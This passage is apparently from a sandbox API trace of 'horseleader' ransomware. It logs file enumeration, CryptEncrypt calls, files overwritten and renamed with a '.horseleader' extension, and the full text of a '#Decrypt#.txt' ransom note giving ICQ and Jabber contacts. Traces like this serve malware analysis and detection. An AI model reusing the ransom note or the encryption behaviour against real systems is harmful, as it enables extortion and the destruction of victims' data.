lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.231] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1b0f, lpOverlapped=0x0) returned 1 [0246.231] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffe4f1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.232] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1b0f, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1b0f, lpOverlapped=0x0) returned 1 [0246.232] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.232] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.232] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.233] CloseHandle (hObject=0x1a4) returned 1 [0246.233] GetProcessHeap () returned 0x780000 [0246.233] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.233] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG.horseleader") returned 93 [0246.233] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program 
Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\thmbnail.png.horseleader")) returned 1 [0246.234] GetProcessHeap () returned 0x780000 [0246.234] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.234] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad12690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x6b0f, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0246.235] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0246.235] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\#Decrypt#.txt") returned 82 [0246.235] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0246.236] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0246.236] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0246.237] lstrlenA (lpString="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") returned 1368 [0246.237] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0246.238] CloseHandle (hObject=0x158) returned 1 [0246.238] GetProcessHeap () returned 0x780000 [0246.238] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0246.238] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="BOLDSTRI", cAlternateFileName="")) returned 1 [0246.238] lstrcmpiW (lpString1="BOLDSTRI", lpString2="Windows") returned -1 [0246.238] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI") returned 68 [0246.238] lstrcmpW (lpString1="BOLDSTRI", lpString2=".") returned 1 [0246.238] lstrcmpW (lpString1="BOLDSTRI", lpString2="..") returned 1 [0246.238] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0246.239] GetProcessHeap () returned 0x780000 [0246.239] RtlAllocateHeap 
(HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0246.239] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\*") returned 70 [0246.239] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0246.241] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0246.241] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\.") returned 70 [0246.241] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0246.241] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0246.242] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0246.242] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\..") returned 71 [0246.242] lstrcmpW (lpString1="..", lpString2=".") 
returned 1 [0246.242] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0246.242] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9250800, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x51a15810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe9250800, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0xeafa, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="BOLDSTRI.ELM", cAlternateFileName="")) returned 1 [0246.242] lstrcmpiW (lpString1="BOLDSTRI.ELM", lpString2="Windows") returned -1 [0246.242] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.ELM") returned 81 [0246.242] StrStrIW (lpFirst="BOLDSTRI.ELM", lpSrch=".horseleader") returned 0x0 [0246.242] lstrcmpW (lpString1="BOLDSTRI.ELM", lpString2="#Decrypt#.txt") returned 1 [0246.242] lstrcmpW (lpString1="BOLDSTRI.ELM", lpString2="_uninstalling_.png") returned 1 [0246.242] lstrlenW (lpString=".testttjffg") returned 11 [0246.242] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.ELM", lpSrch=".testttjffg") returned 0x0 [0246.242] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.242] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.243] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\boldstri.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.243] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.ELM") returned 81 [0246.244] StrStrW (lpFirst="BOLDSTRI.ELM", lpSrch=".txt") returned 0x0 [0246.244] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=60154) returned 1 [0246.244] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.247] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.247] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.248] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.248] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.248] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.248] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x4afa, lpOverlapped=0x0) returned 1 [0246.249] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb506, lpNewFilePointer=0xffffffff, 
dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.249] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x4afa, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x4afa, lpOverlapped=0x0) returned 1 [0246.249] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.249] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.249] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.249] CloseHandle (hObject=0x1a4) returned 1 [0246.249] GetProcessHeap () returned 0x780000 [0246.250] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.250] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.ELM.horseleader") returned 93 [0246.250] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\boldstri.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\boldstri.elm.horseleader")) returned 1 [0246.251] GetProcessHeap () returned 0x780000 [0246.251] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.251] FindNextFileW (in: hFindFile=0x7c6760, 
lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x51a15810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x254, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="BOLDSTRI.INF", cAlternateFileName="")) returned 1 [0246.251] lstrcmpiW (lpString1="BOLDSTRI.INF", lpString2="Windows") returned -1 [0246.251] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.INF") returned 81 [0246.251] StrStrIW (lpFirst="BOLDSTRI.INF", lpSrch=".horseleader") returned 0x0 [0246.251] lstrcmpW (lpString1="BOLDSTRI.INF", lpString2="#Decrypt#.txt") returned 1 [0246.251] lstrcmpW (lpString1="BOLDSTRI.INF", lpString2="_uninstalling_.png") returned 1 [0246.251] lstrlenW (lpString=".testttjffg") returned 11 [0246.251] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.INF", lpSrch=".testttjffg") returned 0x0 [0246.251] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.251] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.251] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\boldstri.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.252] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.INF") returned 81 [0246.252] StrStrW (lpFirst="BOLDSTRI.INF", lpSrch=".txt") returned 0x0 [0246.252] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=596) returned 1 [0246.252] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x254, lpOverlapped=0x0) returned 1 [0246.253] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffdac, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.253] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x254, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x254, lpOverlapped=0x0) returned 1 [0246.254] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.254] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.254] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.254] CloseHandle (hObject=0x1a4) returned 1 [0246.254] GetProcessHeap () returned 0x780000 [0246.254] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.254] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.INF.horseleader") returned 93 [0246.254] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\boldstri.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\boldstri.inf.horseleader")) returned 1 [0246.257] GetProcessHeap () returned 0x780000 [0246.257] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.257] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0xd97, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0246.257] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0246.257] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 80 [0246.257] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0246.257] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0246.257] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0246.257] lstrlenW (lpString=".testttjffg") returned 11 [0246.257] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0246.257] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.257] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, 
pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.258] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.258] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 80 [0246.258] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0246.258] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=3479) returned 1 [0246.258] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0xd97, lpOverlapped=0x0) returned 1 [0246.260] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff269, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.260] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0xd97, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0xd97, lpOverlapped=0x0) returned 1 [0246.261] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.261] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.261] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: 
lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.261] CloseHandle (hObject=0x1a4) returned 1 [0246.261] GetProcessHeap () returned 0x780000 [0246.261] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.261] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF.horseleader") returned 92 [0246.261] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\preview.gif.horseleader")) returned 1 [0246.262] GetProcessHeap () returned 0x780000 [0246.262] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.262] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x7c5d, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0246.263] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0246.263] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 81 [0246.263] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") 